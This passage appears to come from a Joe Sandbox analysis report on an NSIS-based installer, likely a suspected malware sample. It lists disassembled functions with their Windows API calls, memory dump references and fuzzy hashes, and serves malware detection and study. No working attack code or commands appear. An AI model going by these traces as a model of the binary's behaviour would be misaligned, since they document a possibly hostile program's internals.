                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 2709904686-2707566632
                                                                              • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                              • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                                                              • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                              • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                                                              Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                              • CharNextA.USER32(00000000), ref: 00405CDC
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

                                                                              Non-executed Functions

                                                                              Function 0040333D Relevance: 75.7, APIs: 33, Strings: 10, Instructions: 412stringfilecomCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32 ref: 00403360
                                                                              • GetVersion.KERNEL32 ref: 00403366
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                              • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                              • GetModuleHandleW.KERNEL32(00000000,00435000,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                              • CharNextW.USER32(00000000), ref: 00403448
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • GetTempPathW.KERNEL32(00000400,00437800), ref: 00403582
                                                                              • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                              • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                              • GetTempPathW.KERNEL32(000003FC,00437800), ref: 004035B3
                                                                              • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 004035D4
                                                                              • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                              • ExitProcess.KERNEL32 ref: 004036D4
                                                                              • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                              • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                              • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                              • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 00403729
                                                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                              • CopyFileW.KERNEL32 ref: 00403797
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004037C4
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                              • ExitProcess.KERNEL32 ref: 0040387A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 2488574733-3195845224
                                                                              • Opcode ID: f6fbf25430e21501bb68e7fd8701bad57b8adefdd86ce7047aeb7cb0d2a7cc6d
                                                                              • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                              • Opcode Fuzzy Hash: f6fbf25430e21501bb68e7fd8701bad57b8adefdd86ce7047aeb7cb0d2a7cc6d
                                                                              • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                                              Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                              • LoadBitmapW.USER32 ref: 00404CAC
                                                                              • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                              • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                              • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                              • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                              • ShowWindow.USER32(00000000), ref: 0040520D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: c06a76122a38eed4d9117e44778157b81fdc71c1f1957922822c2912a25a1923
                                                                              • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                                              • Opcode Fuzzy Hash: c06a76122a38eed4d9117e44778157b81fdc71c1f1957922822c2912a25a1923
                                                                              • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                                              Function 0040595A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,?,00437800,7570D4C4,00000000), ref: 00405983
                                                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,00437800,7570D4C4,00000000), ref: 004059CB
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,00437800,7570D4C4,00000000), ref: 004059EE
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,00437800,7570D4C4,00000000), ref: 004059F4
                                                                              • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,00437800,7570D4C4,00000000), ref: 00405A04
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                              • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: \*.*
                                                                              • API String ID: 2035342205-1173974218
                                                                              • Opcode ID: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
                                                                              • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                              • Opcode Fuzzy Hash: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
                                                                              • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                                              Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                              • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                              Function 0040658F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,7570D4C4,0040597A,?,00437800,7570D4C4), ref: 0040659A
                                                                              • FindClose.KERNEL32(00000000), ref: 004065A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: 8gB
                                                                              • API String ID: 2295610775-1733800166
                                                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                              Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                              • GetClientRect.USER32(?,?,00000004), ref: 00405499
                                                                              • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                              • ShowWindow.USER32(00000000,?), ref: 00405528
                                                                              • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                                • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004055C4
                                                                              • ShowWindow.USER32(00000000), ref: 004055E8
                                                                              • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                              • ShowWindow.USER32(00000008), ref: 00405637
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                              • CreatePopupMenu.USER32 ref: 0040567C
                                                                              • AppendMenuW.USER32 ref: 00405690
                                                                              • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                              • OpenClipboard.USER32(00000000), ref: 00405711
                                                                              • EmptyClipboard.USER32 ref: 00405717
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                                              • CloseClipboard.USER32 ref: 00405772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: {$6B
                                                                              • API String ID: 590372296-3705917127
                                                                              • Opcode ID: 966f380b203b7feeda30c505118a47af216d833df9063fc1c555560a32d87caa
                                                                              • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                              • Opcode Fuzzy Hash: 966f380b203b7feeda30c505118a47af216d833df9063fc1c555560a32d87caa
                                                                              • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                                              Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                              • ShowWindow.USER32(?), ref: 00403D61
                                                                              • DestroyWindow.USER32 ref: 00403D75
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                              • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                              • EnableWindow.USER32(?,?), ref: 00403FC9
                                                                              • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                              • GetSystemMenu.USER32 ref: 00403FFA
                                                                              • EnableMenuItem.USER32 ref: 00404001
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                              • SetWindowTextW.USER32(?,004236E8,00000000,004236E8,?,004236E8,00000000), ref: 0040406A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                              • String ID: 6B
                                                                              • API String ID: 184305955-4127139157
                                                                              • Opcode ID: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                                                              • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                              • Opcode Fuzzy Hash: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                                                              • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                                              Function 0040395A Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
